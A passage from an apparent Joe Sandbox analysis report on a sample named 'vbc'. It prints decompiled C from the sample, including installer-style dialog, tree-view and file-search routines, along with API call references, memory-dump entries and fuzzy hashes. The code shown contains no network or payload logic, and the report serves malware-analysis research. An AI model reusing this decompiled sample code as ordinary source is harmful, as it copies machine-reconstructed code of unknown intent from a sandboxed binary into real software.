					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                        0x004021b3
                                                        0x004021bd
                                                        0x004021c7
                                                        0x004021d1
                                                        0x004021dc
                                                        0x004021df
                                                        0x004021f9
                                                        0x004021fc
                                                        0x00402202
                                                        0x00402205
                                                        0x0040220f
                                                        0x00402213
                                                        0x00402213
                                                        0x00402218
                                                        0x00402229
                                                        0x00402231
                                                        0x004022e8
                                                        0x004022e8
                                                        0x004022ef
                                                        0x00402237
                                                        0x00402237
                                                        0x00402246
                                                        0x0040224a
                                                        0x0040224d
                                                        0x00402253
                                                        0x00402261
                                                        0x00402264
                                                        0x00402266
                                                        0x00402271
                                                        0x00402271
                                                        0x00402276
                                                        0x00402278
                                                        0x0040227f
                                                        0x0040227f
                                                        0x00402282
                                                        0x0040228b
                                                        0x0040228e
                                                        0x00402294
                                                        0x00402296
                                                        0x004022a0
                                                        0x004022a0
                                                        0x004022a3
                                                        0x004022ac
                                                        0x004022af
                                                        0x004022b8
                                                        0x004022be
                                                        0x004022c0
                                                        0x004022ce
                                                        0x004022ce
                                                        0x004022d1
                                                        0x004022d7
                                                        0x004022d7
                                                        0x004022da
                                                        0x004022e0
                                                        0x004022e6
                                                        0x004022fb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004022e6
                                                        0x004022f1
                                                        0x00402c2d
                                                        0x00402c39

                                                        APIs
                                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID:
                                                        • API String ID: 542301482-0
                                                        • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                                                        • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
                                                        • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                                                        • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 39%
                                                        			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040666E();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                        0x00402923
                                                        0x0040293e
                                                        0x00402949
                                                        0x0040294a
                                                        0x00402a94
                                                        0x00402925
                                                        0x00402928
                                                        0x0040292b
                                                        0x0040292e
                                                        0x0040292e
                                                        0x00402c2d
                                                        0x00402c39

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                                                        • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
                                                        • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                                                        • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405037 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8ac8;
				_v28 =  *0x7a8ab0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8ab9 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F85(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f6c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f80;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f6c = 0;
								 *0x7a1f80 = 0;
								 *0x7a8b00 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00405005();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f80;
									_t201 =  *0x7a8ac8;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8acc <= 0) {
										L86:
										if( *0x7a8b5e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8acc);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f80);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8b00 = _t291;
					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f6c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045CA(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045CA(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8acc <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f80 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f80 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8acc);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045FF(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045FF(_v12);
								L93:
								return E00404631(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                        0x0040503e
                                                        0x00405057
                                                        0x0040505c
                                                        0x00405064
                                                        0x0040506a
                                                        0x00405080
                                                        0x00405083
                                                        0x004052ae
                                                        0x004052b5
                                                        0x004052c9
                                                        0x004052b7
                                                        0x004052b9
                                                        0x004052bc
                                                        0x004052bd
                                                        0x004052c4
                                                        0x004052c4
                                                        0x004052d5
                                                        0x004052e3
                                                        0x004052e6
                                                        0x004052fc
                                                        0x00405371
                                                        0x00405374
                                                        0x00405376
                                                        0x00405380
                                                        0x0040538e
                                                        0x0040538e
                                                        0x00405390
                                                        0x0040539a
                                                        0x004053a0
                                                        0x004053a3
                                                        0x004053a6
                                                        0x004053c1
                                                        0x004053a8
                                                        0x004053b2
                                                        0x004053b2
                                                        0x004053a6
                                                        0x0040539a
                                                        0x00000000
                                                        0x00405374
                                                        0x00405301
                                                        0x0040530c
                                                        0x00405311
                                                        0x00405318
                                                        0x0040531d
                                                        0x00405321
                                                        0x0040532c
                                                        0x0040532c
                                                        0x00405330
                                                        0x00405334
                                                        0x00405338
                                                        0x0040534b
                                                        0x0040533a
                                                        0x0040533a
                                                        0x00405341
                                                        0x00405347
                                                        0x00405343
                                                        0x00405343
                                                        0x00405343
                                                        0x00405341
                                                        0x0040534f
                                                        0x00405351
                                                        0x00405364
                                                        0x00405367
                                                        0x0040536a
                                                        0x0040536a
                                                        0x00405334
                                                        0x00000000
                                                        0x00405321
                                                        0x00405303
                                                        0x0040530a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004053c4
                                                        0x004053c4
                                                        0x004053cb
                                                        0x0040543c
                                                        0x00405444
                                                        0x0040544c
                                                        0x0040544c
                                                        0x00405455
                                                        0x00405457
                                                        0x0040545e
                                                        0x00405461
                                                        0x00405461
                                                        0x00405467
                                                        0x0040546e
                                                        0x00405471
                                                        0x00405471
                                                        0x00405477
                                                        0x0040547d
                                                        0x00405483
                                                        0x00405483
                                                        0x00405490
                                                        0x004055f1
                                                        0x004055f8
                                                        0x00405615
                                                        0x0040561b
                                                        0x0040562d
                                                        0x0040562d
                                                        0x00000000
                                                        0x00405496
                                                        0x00405498
                                                        0x0040549d
                                                        0x004054a2
                                                        0x004054a7
                                                        0x004054a9
                                                        0x004054a9
                                                        0x004054aa
                                                        0x004054ab
                                                        0x004054ad
                                                        0x004054ad
                                                        0x004054b5
                                                        0x004054f6
                                                        0x004054f8
                                                        0x00405508
                                                        0x0040550b
                                                        0x00405510
                                                        0x00405517
                                                        0x0040551a
                                                        0x004055bc
                                                        0x004055c5
                                                        0x004055cd
                                                        0x004055cd
                                                        0x004055db
                                                        0x004055ec
                                                        0x004055ec
                                                        0x00000000
                                                        0x004055db
                                                        0x00405520
                                                        0x00405523
                                                        0x00405529
                                                        0x0040552e
                                                        0x00405530
                                                        0x00405532
                                                        0x00405538
                                                        0x0040553f
                                                        0x00405544
                                                        0x0040554b
                                                        0x0040554e
                                                        0x0040554e
                                                        0x00405555
                                                        0x00405561
                                                        0x00405565
                                                        0x00405567
                                                        0x00405567
                                                        0x00405557
                                                        0x00405559
                                                        0x00405559
                                                        0x00405587
                                                        0x00405593
                                                        0x004055a2
                                                        0x004055a2
                                                        0x004055a4
                                                        0x004055a7
                                                        0x004055b0
                                                        0x00000000
                                                        0x004054b7
                                                        0x004054c2
                                                        0x004054c5
                                                        0x004054ca
                                                        0x004054cc
                                                        0x004054d0
                                                        0x004054e0
                                                        0x004054ea
                                                        0x004054ec
                                                        0x004054ef
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004054d2
                                                        0x004054d2
                                                        0x004054d8
                                                        0x004054da
                                                        0x004054da
                                                        0x004054db
                                                        0x004054dc
                                                        0x00000000
                                                        0x004054d2
                                                        0x004054b5
                                                        0x00405490
                                                        0x004053d3
                                                        0x00000000
                                                        0x004053e9
                                                        0x004053f3
                                                        0x004053f8
                                                        0x00000000
                                                        0x00000000
                                                        0x0040540a
                                                        0x0040540f
                                                        0x0040541b
                                                        0x0040541b
                                                        0x0040541d
                                                        0x0040542c
                                                        0x0040542e
                                                        0x00405432
                                                        0x00405435
                                                        0x00000000
                                                        0x00405435
                                                        0x004053d3
                                                        0x00405089
                                                        0x0040508e
                                                        0x00405097
                                                        0x0040509e
                                                        0x004050b0
                                                        0x004050bb
                                                        0x004050c1
                                                        0x004050cf
                                                        0x004050e3
                                                        0x004050e8
                                                        0x004050f5
                                                        0x004050fa
                                                        0x00405110
                                                        0x00405121
                                                        0x0040512e
                                                        0x0040512e
                                                        0x00405131
                                                        0x00405137
                                                        0x00405139
                                                        0x0040513c
                                                        0x00405141
                                                        0x00405146
                                                        0x00405148
                                                        0x00405148
                                                        0x00405168
                                                        0x00405168
                                                        0x0040516a
                                                        0x0040516b
                                                        0x00405170
                                                        0x00405176
                                                        0x0040517a
                                                        0x0040517f
                                                        0x00405187
                                                        0x0040518b
                                                        0x00405190
                                                        0x00405195
                                                        0x0040519d
                                                        0x004051a0
                                                        0x00405270
                                                        0x00405283
                                                        0x00000000
                                                        0x004051a6
                                                        0x004051a9
                                                        0x004051ac
                                                        0x004051af
                                                        0x004051af
                                                        0x004051b5
                                                        0x004051be
                                                        0x004051c1
                                                        0x004051c5
                                                        0x004051c8
                                                        0x004051cb
                                                        0x004051d4
                                                        0x004051dd
                                                        0x004051e0
                                                        0x004051e3
                                                        0x004051e6
                                                        0x00405224
                                                        0x0040524f
                                                        0x00405226
                                                        0x00405235
                                                        0x00405235
                                                        0x004051e8
                                                        0x004051eb
                                                        0x004051f9
                                                        0x00405203
                                                        0x0040520b
                                                        0x00405212
                                                        0x0040521d
                                                        0x0040521d
                                                        0x004051e6
                                                        0x00405255
                                                        0x00405256
                                                        0x00405262
                                                        0x00405262
                                                        0x0040526e
                                                        0x00405289
                                                        0x0040528c
                                                        0x004052a9
                                                        0x00000000
                                                        0x0040528e
                                                        0x00405293
                                                        0x0040529c
                                                        0x0040562f
                                                        0x00405641
                                                        0x00405641
                                                        0x0040528c
                                                        0x00000000
                                                        0x0040526e
                                                        0x004051a0

                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 0040504F
                                                        • GetDlgItem.USER32(?,00000408), ref: 0040505A
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
                                                        • LoadImageW.USER32 ref: 004050BB
                                                        • SetWindowLongW.USER32 ref: 004050D4
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
                                                        • DeleteObject.GDI32(00000000), ref: 00405131
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                                                          • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405275
                                                        • SetWindowLongW.USER32 ref: 00405283
                                                        • ShowWindow.USER32(?,00000005), ref: 00405293
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405461
                                                        • GlobalFree.KERNEL32(?), ref: 00405471
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
                                                        • ShowWindow.USER32(?,00000000), ref: 0040561B
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405626
                                                        • ShowWindow.USER32(00000000), ref: 0040562D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                                                        • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
                                                        • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                                                        • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404789 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				char _v8;
